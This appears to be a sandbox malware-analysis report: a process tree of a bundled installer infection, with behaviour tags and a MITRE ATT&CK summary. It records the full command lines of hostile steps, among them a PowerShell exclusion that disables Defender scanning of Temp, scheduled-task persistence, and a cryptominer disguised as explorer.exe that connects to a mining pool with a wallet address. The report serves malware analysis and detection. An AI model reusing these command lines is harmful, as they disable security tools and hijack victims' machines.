  wmiadap.exe /F /T /R
  2⤵
  PID:6560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2528

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1956

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1156

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:892

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:320

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:4692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
      4⤵
      PID:4792
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1917b8fb5f09db8.exe
        
        Sun1917b8fb5f09db8.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
      4⤵
      PID:4840
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun193fda712d9f1.exe
        
        Sun193fda712d9f1.exe
        5⤵
        Executes dropped EXE
        
        PID:1968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4896
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19e4ade31b2a.exe
        
        Sun19e4ade31b2a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1184
      - C:\Users\Admin\AppData\Roaming\4111071.scr
        
        "C:\Users\Admin\AppData\Roaming\4111071.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5100
      - C:\Users\Admin\AppData\Roaming\5262791.scr
        
        "C:\Users\Admin\AppData\Roaming\5262791.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4640
        
        C:\Users\Admin\AppData\Roaming\5262791.scr
        
        "C:\Users\Admin\AppData\Roaming\5262791.scr"
        7⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 896
        7⤵
        Program crash
        
        PID:5208
      - C:\Users\Admin\AppData\Roaming\7574743.scr
        
        "C:\Users\Admin\AppData\Roaming\7574743.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
      - C:\Users\Admin\AppData\Roaming\2340772.scr
        
        "C:\Users\Admin\AppData\Roaming\2340772.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4808
      - C:\Users\Admin\AppData\Roaming\3596903.scr
        
        "C:\Users\Admin\AppData\Roaming\3596903.scr" /S
        6⤵
        
        PID:624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
      4⤵
      PID:4844
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19262b9e49ad.exe
        
        Sun19262b9e49ad.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:964
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:6940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1908b94df837b3158.exe
        
        Sun1908b94df837b3158.exe
        5⤵
        
        PID:1516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4796
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19de8ff4b6aefeb8.exe
        
        Sun19de8ff4b6aefeb8.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1068
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 656
        6⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4916
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 680
        6⤵
        Program crash
        
        PID:5480
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 644
        6⤵
        Program crash
        
        PID:5828
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 664
        6⤵
        Program crash
        
        PID:4732
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 884
        6⤵
        Program crash
        
        PID:6196
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 928
        6⤵
        Program crash
        
        PID:6812
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1176
        6⤵
        Program crash
        
        PID:4024
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1216
        6⤵
        Program crash
        
        PID:5900
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1280
        6⤵
        Program crash
        
        PID:5724
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1268
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:6720
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3172
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun191101c1aaa.exe
        
        Sun191101c1aaa.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:404
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:4076
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:3520
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:6568
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6164
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:7320
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7564
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:7400
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7016
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4484
        
        C:\ProgramData\7803407.exe
        
        "C:\ProgramData\7803407.exe"
        8⤵
        Executes dropped EXE
        
        PID:5336
        
        C:\ProgramData\6514043.exe
        
        "C:\ProgramData\6514043.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5936
        
        C:\ProgramData\6514043.exe
        
        "C:\ProgramData\6514043.exe"
        9⤵
        Executes dropped EXE
        
        PID:5480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 948
        9⤵
        Program crash
        
        PID:908
        
        C:\ProgramData\6203035.exe
        
        "C:\ProgramData\6203035.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5812
        
        C:\ProgramData\5436869.exe
        
        "C:\ProgramData\5436869.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4608
        
        C:\ProgramData\5844605.exe
        
        "C:\ProgramData\5844605.exe"
        8⤵
        Executes dropped EXE
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:4872
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 804
        8⤵
        Program crash
        
        PID:5488
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 844
        8⤵
        Program crash
        
        PID:6012
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 868
        8⤵
        Program crash
        
        PID:5804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 960
        8⤵
        Program crash
        
        PID:1444
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 996
        8⤵
        Program crash
        
        PID:5348
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 1084
        8⤵
        Program crash
        
        PID:5900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 1156
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of AdjustPrivilegeToken
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        Executes dropped EXE
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\is-D8KGN.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-D8KGN.tmp\setup_2.tmp" /SL5="$10304,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:5308
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        
        PID:5144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2940
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19eb40faaaa9.exe
        
        Sun19eb40faaaa9.exe
        5⤵
        Executes dropped EXE
        
        PID:1388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
      4⤵
      PID:424
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun198361825f4.exe
        
        Sun198361825f4.exe
        5⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:524
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1905815e51282417.exe
        
        Sun1905815e51282417.exe
        5⤵
        Executes dropped EXE
        
        PID:1332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:664
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun195a1614ec24e6a.exe
        
        Sun195a1614ec24e6a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      4⤵
      PID:820
    - - C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1966fb31dd5a07.exe
        
        Sun1966fb31dd5a07.exe
        5⤵
        Executes dropped EXE
        
        PID:2920
      - C:\Users\Admin\AppData\Local\Temp\is-G50VH.tmp\Sun1966fb31dd5a07.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G50VH.tmp\Sun1966fb31dd5a07.tmp" /SL5="$6005C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1966fb31dd5a07.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\is-DREF4.tmp\Ze2ro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DREF4.tmp\Ze2ro.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:2764
        
        C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe
        
        "C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\is-541D2.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-541D2.tmp\ultramediaburner.tmp" /SL5="$603BA,281924,62464,C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:6452
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\61-afce5-63a-7b393-080ceaf84e41a\Hahypiqidi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\61-afce5-63a-7b393-080ceaf84e41a\Hahypiqidi.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\6e-c2c24-280-8a685-009fc581ecbdc\Dapicelebae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6e-c2c24-280-8a685-009fc581ecbdc\Dapicelebae.exe"
        8⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:6468
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apjv1pc4.qjz\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\apjv1pc4.qjz\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\apjv1pc4.qjz\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:5988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:2840
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632174500 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:3588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chb1iugy.nnu\anyname.exe & exit
        9⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\chb1iugy.nnu\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\chb1iugy.nnu\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:6816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bflb4kuu.kvm\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:5948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Executes dropped EXE
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\bflb4kuu.kvm\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\bflb4kuu.kvm\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:5772

C:\Users\Admin\AppData\Local\Temp\is-MOQ41.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MOQ41.tmp\setup_2.tmp" /SL5="$3036A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:5536

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5948
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  PID:5992

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
1⤵
- Executes dropped EXE
PID:5428

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2176
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  PID:2956

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4724
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 25A01F8243E539914B448E5AD159E631 C
  2⤵
  - Loads dropped DLL
  PID:5304
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5564E9B26ED9D1F63DBDFD3C10F2CAAC
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:5732
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:8092
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Executes dropped EXE
      PID:624
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A70E53D832ED2402ECBE4C2523875BD0 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:5752

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6636

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1264

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7712

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:7896

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5596
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:7600

C:\Users\Admin\AppData\Local\Temp\13AE.exe
C:\Users\Admin\AppData\Local\Temp\13AE.exe
1⤵
- Executes dropped EXE
PID:6824

C:\Users\Admin\AppData\Local\Temp\3EB7.exe
C:\Users\Admin\AppData\Local\Temp\3EB7.exe
1⤵
- Executes dropped EXE
PID:7156

C:\Users\Admin\AppData\Local\Temp\6FBB.exe
C:\Users\Admin\AppData\Local\Temp\6FBB.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6180

C:\Users\Admin\AppData\Local\Temp\F24A.exe
C:\Users\Admin\AppData\Local\Temp\F24A.exe
1⤵
- Executes dropped EXE
PID:7464

C:\Users\Admin\AppData\Local\Temp\333.exe
C:\Users\Admin\AppData\Local\Temp\333.exe
1⤵
- Executes dropped EXE
PID:7596

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery